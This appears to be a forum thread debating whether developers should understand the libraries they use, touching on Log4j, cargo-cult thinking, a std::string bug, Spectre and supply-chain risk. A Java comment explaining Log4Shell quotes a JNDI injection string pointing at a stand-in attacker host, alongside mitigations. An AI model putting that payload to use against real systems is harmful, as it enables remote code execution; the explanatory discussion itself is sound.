Here’s an example: this is the interface for Log4j:
https://logging.apache.org/log4j/2.x/log4j-api/apidocs/org/apache/logging/log4j/Logger.html
It’s dead simple to use. I’ve used it a zillion times. Instantiate a logger in your class, and start writing log entries. There is no reason at all to know how it is written. In fact, the same interface could be used for a whole lot of different implementations, even in different languages. For example, someone could improve performance by rewriting some internal Java code in assembler, and consumers would not, and should not, have to know. If the implementation mattered to consumers, then every time log4j was updated, thousands of applications would have to be modified.
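For anyone who hasn’t used it, here is a minimal sketch of that usage pattern (the class name and messages are invented for illustration): get a Logger through the interface and write entries, with no knowledge of what sits behind it.

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    // Hypothetical consumer class, written purely against the Logger interface.
    public class OrderService {
        private static final Logger log = LogManager.getLogger(OrderService.class);

        public void placeOrder(String orderId, int quantity) {
            log.info("Placing order {} (quantity {})", orderId, quantity);
            if (quantity <= 0) {
                log.error("Rejected order {}: quantity must be positive", orderId);
            }
        }
    }

Nothing in that code says anything about how the entries get formatted, buffered, or written; swap a different implementation in behind LogManager and this class is none the wiser.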
It’s somewhat amazing that you chose that example. As I’m sure you know, log4j contains a massive security hole allowing remote code execution by anyone who can get plain text into the log (basically anyone).
It’s a massive problem specifically because it was used by thousands (probably hundreds of thousands) of parties that did no investigation of how it operated. If they had, they would have preemptively disabled the buggy feature or added some extra sanitization. But no, they treated it as a secure black box, since it was basically advertised that way, and now it’s the single biggest security problem on the net.
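To make the mechanism concrete, here is a hedged sketch of the kind of code that was everywhere (names are invented; the behavior described in the comments applies to the affected Log4j 2.x versions):

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    // Hypothetical example of the pattern that made Log4Shell (CVE-2021-44228)
    // so widespread: routinely logging attacker-controllable text.
    public class LoginAudit {
        private static final Logger log = LogManager.getLogger(LoginAudit.class);

        public void recordFailedLogin(String usernameFromRequest) {
            // On affected 2.x versions (before 2.15.0), lookups were expanded in the
            // formatted message, so a "username" like ${jndi:ldap://attacker.example/a}
            // logged here would trigger a remote JNDI lookup and could lead to
            // remote code execution.
            log.warn("Failed login for user {}", usernameFromRequest);
        }
    }

The stop-gap mitigations that circulated at the time, such as setting the log4j2.formatMsgNoLookups system property to true on 2.10 through 2.14.1 or stripping the JndiLookup class out of the jar, were exactly the kind of preemptive change you could only make if you were willing to look under the hood.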
No it isn’t, and no it shouldn’t.
If you want to learn the implementation details of every class you use, go for it. But it’s not necessary, and it must not be necessary. If programmers had to learn the implementation of every class they used, nothing would get done. And if you spent my time and money sitting around learning the implementation of every library you used, you’d get a bad review and a lesson in priorities. We built applications that used hundreds of libraries, probably containing millions of lines of code. Good luck with learning all that. You should be spending your development time making sure your own code is written correctly and tested properly.
Occasionally we will dig into the code of a library, typically when we suspect the library is buggy or when it needs to be modified for our use. But in that case we always go to the library authors and try to get the change added to the library itself, because dealing with forked libraries is a pain and not good practice if it can be avoided.
So you think the problem the South Sea islanders had was that they just didn’t have the electronics skills to build proper headsets and microphones? That’s just not the case. Dave Clark himself could have dropped a shipping container of headsets and microphones and it would have made no difference, because the airplanes didn’t arrive because people on the island had headsets. They arrived because the countries that flew them were fighting a war, and when the war ended, so did the flights. THAT was what the islanders did not understand. The headsets weren’t causal - they were just one of many requirements for planes to land, but they weren’t the reason the planes came.
The cargo cultists also built ‘runways’ and parked bamboo airplanes alongside them, because they were recreating the conditions they saw the last time the planes came.
I can give you a perfect example of modern cargo-cult thinking: a city planner notices that other cities with thriving businesses also have business centers, and decides that if their city builds a business center too, businesses will come. In fact, the existence of a business center is a result of having lots of businesses, not the cause of it. Cargo-cult thinking is all around us, but it has nothing to do with modular programming.
What I said is that having no knowledge of the underlying details is a significant limitation, not that one must learn every detail of every class they use. At the least, one must have the ability to dig down into the details.
As a real example, I recently debugged a std::string problem that cropped up after switching to a new compiler version. Now, I had never debugged std::string before; it’s obviously rock-solid since it’s the core C++ string class. Nevertheless there was a problem.
Eventually I traced it to some code on our side that had memset the string’s memory to zeroes as an init step. The previous std::string implementation happened to accept this and treated it as an empty string. With the new implementation that no longer worked, and it crashed.
This was a bug in our code, but nevertheless the abstraction leaked. And I was able to debug it quickly and definitively because I was comfortable stepping through the C++ standard library and had some idea of how it worked going in.
If the islanders really understood things at all levels, from the functioning radios to the way the planes navigated to the entire logistical system, they could have gotten some planes to land. They would have found, basically, a security vulnerability in the system, by faking RDF signals or even just by social engineering. Or, if they hadn’t, they’d have known why their fakes didn’t work.
Hackers, black-hat or otherwise, don’t limit themselves to one layer of the system. They don’t assume the abstraction is perfect. They find holes in the layers, ones that can shoot right down to a lower layer that might be making assumptions that are valid at its own level but not at a higher one.
By the way, with distributed computing, including cloud computing, you can’t know the implementation. And modern development environments pull down the latest version of all your packages unless you specifically pin the version (which is not good practice), meaning the implementation could change on you at any time.
When log4j is fixed, the fix could be a simple change or a complete rewrite, and none of the consumers of the class need to care. By design. When people rebuild the software that uses the class, the old implementation will simply be replaced with the new one.
Of course you can. Why do you think Spectre and Meltdown were such big issues? Because they made it so that another process on the system, even one running a different guest OS on the same physical system (i.e. totally out of your control), could steal information.
You’re supposed to assume that the cloud is magic and just works seamlessly all the time, but it doesn’t.
Frankly, I think we’re really due for a reckoning in package management, and it won’t be further in the direction of the current free-for-all. There is a huge complex of supply chain vulnerabilities across all package repositories.
And in the meantime, all your trade secrets and business confidential data are belong to us.
Yeah, that’s a different issue. We are doing too much centralizing, which is destroying the fault-tolerant nature of the internet. It makes sense economically, or we wouldn’t do it, but the systemic risk of creating many single points of failure and common attack surfaces is not priced in. It’s an externality.